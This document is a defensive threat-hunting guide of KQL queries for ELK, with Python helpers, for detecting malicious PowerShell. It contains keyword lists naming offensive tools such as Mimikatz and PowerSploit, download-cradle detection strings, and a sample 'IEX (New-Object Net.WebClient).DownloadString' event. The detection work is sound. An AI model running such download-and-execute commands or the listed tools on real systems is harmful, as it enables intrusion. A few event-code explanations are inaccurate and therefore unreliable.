# Use Case With elk

ELK is an open source stack that consists of three applications (Elasticsearch, Logstash and Kibana) working in synergy to provide users with end-to-end search and visualization capabilities to analyze and investigate log file sources in real time.

<figure><img src="/files/8nQxJK07rqpvnrqzShe3" alt=""><figcaption></figcaption></figure>

Let's get straight to the point.

#### 1- Perform a hunt for well-known PowerShell Offensive Frameworks and commands


```kql
(event.code:4688 OR event.code:1) AND process.name:"powershell.exe" AND (process.command_line:(*Empire* OR *PowerSploit* OR *Mimikatz* OR *PowershellEmpire* OR *Inveigh* OR *BloodHound* OR *PowerUp* OR *nishang* OR *Seatbelt* OR *SharpHound*) OR process.command_line:(*Invoke-Mimikatz* OR *Invoke-SharpHound* OR *Invoke-Inveigh* OR *Invoke-BloodHound* OR *Invoke-Phant0m* OR *Invoke-StealthUser* OR *Invoke-PortScan* OR *Invoke-TokenManipulation* OR *PowerView.ps1* OR *PowerUp.ps1*))
```

This query searches for two types of events:

* Windows process creation events with event code 4688, indicating a new process was created.
* File creation events with event code 1, indicating a new file was created.

The query filters for events where the process name is "powershell.exe" and the process command line includes any of the well-known PowerShell offensive frameworks and commands, such as Empire, PowerSploit, Mimikatz, BloodHound, and others. The query uses the `OR` operator to match any of the keywords within the command line.

#### 2- Perform a hunt for suspicious parent process spawning PowerShell

```kql
event.code:4688 AND event.action:created AND process.parent.name:"explorer.exe" AND process.name:"powershell.exe"
```

This query searches for Windows process creation events with event code 4688, indicating a new process was created. It further filters for events where the process action is "created" and the parent process name is "explorer.exe". Additionally, the query looks for events where the new process is named "powershell.exe", indicating a potential instance of PowerShell being spawned by a suspicious parent process.

We can also expand the query to include additional fields or filters, such as the user who executed the process or the path of the executable.

#### 3- Perform a hunt for renamed PowerShell.exe

```kql
(event.code:4688 OR event.code:1) AND process.name:"powershell.exe" AND process.executable:(*rename* OR *renamed*) AND NOT process.executable:"powershell.exe"
```

This query searches for two types of events:

* Windows process creation events with event code 4688, indicating a new process was created.
* File creation events with event code 1, indicating a new file was created.

The query filters for events where the process name is "powershell.exe", but the process executable includes the words "rename" or "renamed", indicating a potential instance of PowerShell being renamed by an attacker. The `NOT` operator is used to exclude events where the process executable is "powershell.exe" to avoid including legitimate instances of PowerShell.

#### 4- Perform a hunt for base64-encoded PowerShell commands

```kql
(event.code:4688 OR event.code:1) AND process.name:"powershell.exe" AND process.command_line:(*-encodedcommand* OR *-enc* OR *-encoded*) AND process.command_line:*base64*
```

This query searches for two types of events:

* Windows process creation events with event code 4688, indicating a new process was created.
* File creation events with event code 1, indicating a new file was created.

The query filters for events where the process name is "powershell.exe" and the process command line includes any of the following parameters: "-encodedcommand", "-enc", or "-encoded". Additionally, the query looks for events where the process command line includes the word "base64", indicating a potential instance of base64-encoded PowerShell commands.
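As an added example that is not part of the original page, the triage step that follows a hit from this hunt: the Python below applies the query's filters to constructed ECS-style process events, pulls out the blob after any -EncodedCommand style switch (including the shortened forms -e, -ec, -enc and so on that the wildcards above cover) and decodes it to the original script text. Host names and command lines are constructed samples.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, -encoded, ...), which is why the query above wildcards several forms.
_PREFIXES = sorted(["e"] + ["encodedcommand"[:n] for n in range(2, 15)], key=len, reverse=True)
_ENC_RE = re.compile(r"(?:^|\s)[-/](?:" + "|".join(_PREFIXES) + r")\s+([A-Za-z0-9+/=]+)",
                     re.IGNORECASE)

def extract_encoded_command(command_line: str):
    """Return the base64 blob following an -EncodedCommand style switch, or None."""
    m = _ENC_RE.search(command_line)
    return m.group(1) if m else None

def decode_encoded_command(blob: str) -> str:
    """The blob is base64 of the script text encoded as UTF-16LE."""
    return base64.b64decode(blob, validate=True).decode("utf-16le")

def hunt_encoded_powershell(events):
    """Apply the filters of hunt 4 to ECS-style process events and decode each hit."""
    hits = []
    for ev in events:
        if ev.get("event.code") not in (4688, 1):   # the two event codes the query above uses
            continue
        if ev.get("process.name", "").lower() != "powershell.exe":
            continue
        blob = extract_encoded_command(ev.get("process.command_line", ""))
        if blob is None:
            continue
        try:
            script = decode_encoded_command(blob)
        except (ValueError, UnicodeDecodeError):
            script = "<payload is not valid base64/UTF-16LE>"
        hits.append({"host": ev.get("host.name"), "decoded": script})
    return hits

# Constructed sample events (not real telemetry). "ZABpAHIA" is UTF-16LE "dir".
SAMPLE_EVENTS = [
    {"event.code": 4688, "host.name": "ws01", "process.name": "powershell.exe",
     "process.command_line": "powershell.exe -NoP -W Hidden -e ZABpAHIA"},
    {"event.code": 1, "host.name": "ws02", "process.name": "powershell.exe",
     "process.command_line": "powershell.exe -EncodedCommand "
     + base64.b64encode("Write-Host 'hunt test'".encode("utf-16le")).decode()},
    {"event.code": 4688, "host.name": "ws03", "process.name": "powershell.exe",
     "process.command_line": "powershell.exe -ExecutionPolicy Bypass -File a.ps1"},
]

if __name__ == "__main__":
    for hit in hunt_encoded_powershell(SAMPLE_EVENTS):
        print(hit)
```

Note that -ExecutionPolicy also starts with "-e", so the matcher requires whitespace directly after the switch before it treats the next token as a payload.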

#### 5- Perform a hunt for PowerShell attacks utilizing GZIP compression

```kql
event.code:4103 and event.provider:"Microsoft-Windows-PowerShell" and event.opcode:5 and event.original:"Content-Encoding: gzip"
```

This query searches for events with code 4103 from the Microsoft-Windows-PowerShell provider with opcode 5 (which indicates the use of a PowerShell script block). It then checks whether the string "Content-Encoding: gzip" is present in the original field of the event, which holds the full raw message.


#### 6- Perform a hunt for obfuscated PowerShell code using XOR

```kql
event.code:4104 and event.provider:"Microsoft-Windows-PowerShell" and event.opcode:3 and event.original:"XOR"
```

This query searches for events with code 4104 from the Microsoft-Windows-PowerShell provider with opcode 3 (which indicates the use of the PowerShell XOR operator). It then checks whether the string "XOR" is present in the original field of the event, which holds the full raw message.

#### 7- Perform a hunt for execution of an assembly from file by PowerShell

```kql
event.code:800 and event.provider:"Microsoft-Windows-PowerShell" and event.original:"Assembly" and event.original:"LoadFrom"
```

This query searches for events with code 800 from the Microsoft-Windows-PowerShell provider. Code 800 indicates that an external module or assembly was loaded by PowerShell. The query checks whether the strings "Assembly" and "LoadFrom" are both present in the original field of the event, which holds the full raw message.

#### 8- Perform a hunt for PowerShell commands downloading content

```kql
(event.code:4103 or event.code:4104) and event.provider:"Microsoft-Windows-PowerShell" and event.original:("Invoke-WebRequest" or "Invoke-RestMethod" or "Net.WebClient")
```

This query searches for events with code 4103 or 4104 from the Microsoft-Windows-PowerShell provider and checks whether the string "Invoke-WebRequest", "Invoke-RestMethod" or "Net.WebClient" is present in the original field of the event. These are common PowerShell commands used for downloading content from the internet.

#### 9- Perform a hunt for obfuscated PowerShell commands

```kql
(event.code:4103 or event.code:4104) and event.provider:"Microsoft-Windows-PowerShell" and event.original:"EncodedCommand"
```

This query searches for events with code 4103 or 4104 from the Microsoft-Windows-PowerShell provider. Code 4103 indicates that a PowerShell script block was executed, while code 4104 indicates that a PowerShell command was executed. The query checks whether the string "EncodedCommand" is present in the original field of the event, which indicates that the PowerShell command was obfuscated.

or

```kql
(event.code:4103 or event.code:4104) and event.provider:"Microsoft-Windows-PowerShell" and event.original:"Out-String -Stream | %{$_ -replace"
```

This query searches for events with code 4103 or 4104 from the Microsoft-Windows-PowerShell provider and checks whether the original field of the event contains the string `Out-String -Stream | %{$_ -replace`. This string is commonly used to obfuscate PowerShell commands by converting them to a string, replacing certain characters, and then invoking them using the `&` operator.

or

```kql
(event.code:4103 or event.code:4104) and event.provider:"Microsoft-Windows-PowerShell" and event.original:"-NoP -sta -NonI -Win"
```

This query searches for events with code 4103 or 4104 from the Microsoft-Windows-PowerShell provider and checks whether the original field of the event contains the string "-NoP -sta -NonI -Win". This combination of switches is often used to obfuscate PowerShell commands by disabling PowerShell's default execution policy, running in STA (Single-Threaded Apartment) mode, disabling interactive prompts, and running in a non-interactive session.

or

```kql
(event.code:4103 or event.code:4104) and event.provider:"Microsoft-Windows-PowerShell" and event.original:"iex (new-object net.webclient)"
```

This query searches for events with code 4103 or 4104 from the Microsoft-Windows-PowerShell provider and checks whether the original field of the event contains the string "iex (new-object net.webclient)". This pattern downloads script content with a Net.WebClient object and runs it straight from memory with Invoke-Expression (iex), so nothing is written to disk for file-based controls to inspect.

* As these queries show, PowerShell offers a number of techniques that can be used to circumvent detection and analysts.
* If any query returns any events, they may indicate obfuscated PowerShell commands. You can then investigate these events further using other features of the ELK SIEM solution, such as visualization, timeline analysis, or threat intelligence lookups, to determine if they are indeed malicious.
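As an added example that is not from the original page, the string hunts from sections 5 to 9 applied in Python to constructed 4103/4104/800 records. Matching is case-insensitive and whitespace-normalised, because an exact KQL match against a keyword field misses the same indicator with different casing or spacing; field names follow ECS and every sample event is constructed.

```python
import re

# Indicator strings taken from hunts 5-9 above. Each pattern is applied
# case-insensitively to whitespace-normalised text, since an exact match on a
# keyword field misses trivially re-cased or re-spaced variants.
HUNTS = {
    "gzip_payload": [r"Content-Encoding:\s*gzip"],
    "xor_obfuscation": [r"\bb?xor\b"],                        # "XOR" and the -bxor operator
    "assembly_loadfrom": [r"(?=.*Assembly)(?=.*LoadFrom)"],  # both strings required
    "download_cradle": [r"Invoke-WebRequest", r"Invoke-RestMethod", r"Net\.WebClient"],
    "encoded_or_flags": [r"EncodedCommand", r"Out-String -Stream \| %\{\$_ -replace",
                         r"-NoP -sta -NonI -Win", r"iex \(new-object net\.webclient\)"],
}
_COMPILED = {name: [re.compile(p, re.IGNORECASE) for p in pats]
             for name, pats in HUNTS.items()}
_CODES = {4103, 4104, 800}   # the PowerShell provider event codes the hunts above use

def hunt_script_blocks(events):
    """Return, per matching event, the names of the hunts whose indicators fired."""
    hits = []
    for ev in events:
        if ev.get("event.provider") != "Microsoft-Windows-PowerShell":
            continue
        if ev.get("event.code") not in _CODES:
            continue
        text = re.sub(r"\s+", " ", ev.get("event.original", ""))
        fired = sorted(name for name, pats in _COMPILED.items()
                       if any(p.search(text) for p in pats))
        if fired:
            hits.append({"record": ev["event.id"], "hunts": fired})
    return hits

# Constructed sample records (not real logs); the URL host is example.invalid.
SAMPLE_EVENTS = [
    {"event.id": "1", "event.code": 4104, "event.provider": "Microsoft-Windows-PowerShell",
     "event.original": "Creating Scriptblock text (1 of 1):\n"
                       "IEX (New-Object   Net.WebClient).DownloadString('http://example.invalid/a')"},
    {"event.id": "2", "event.code": 4104, "event.provider": "Microsoft-Windows-PowerShell",
     "event.original": "$k = 0x41; $out = $bytes | % { $_ -bxor $k }"},
    {"event.id": "3", "event.code": 4103, "event.provider": "Microsoft-Windows-PowerShell",
     "event.original": "CommandInvocation(Get-ChildItem): \"Get-ChildItem\""},
    {"event.id": "4", "event.code": 800, "event.provider": "Microsoft-Windows-PowerShell",
     "event.original": "Pipeline execution details: [System.Reflection.Assembly]::LoadFrom('C:\\tools\\x.dll')"},
    {"event.id": "5", "event.code": 4104, "event.provider": "Microsoft-Windows-Sysmon",
     "event.original": "Net.WebClient"},   # wrong provider, so it must be ignored
]

if __name__ == "__main__":
    for hit in hunt_script_blocks(SAMPLE_EVENTS):
        print(hit)
```

Record 1 only matches the "iex (new-object net.webclient)" indicator because the extra spaces are collapsed and the case is ignored; the literal KQL phrase above would miss it.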

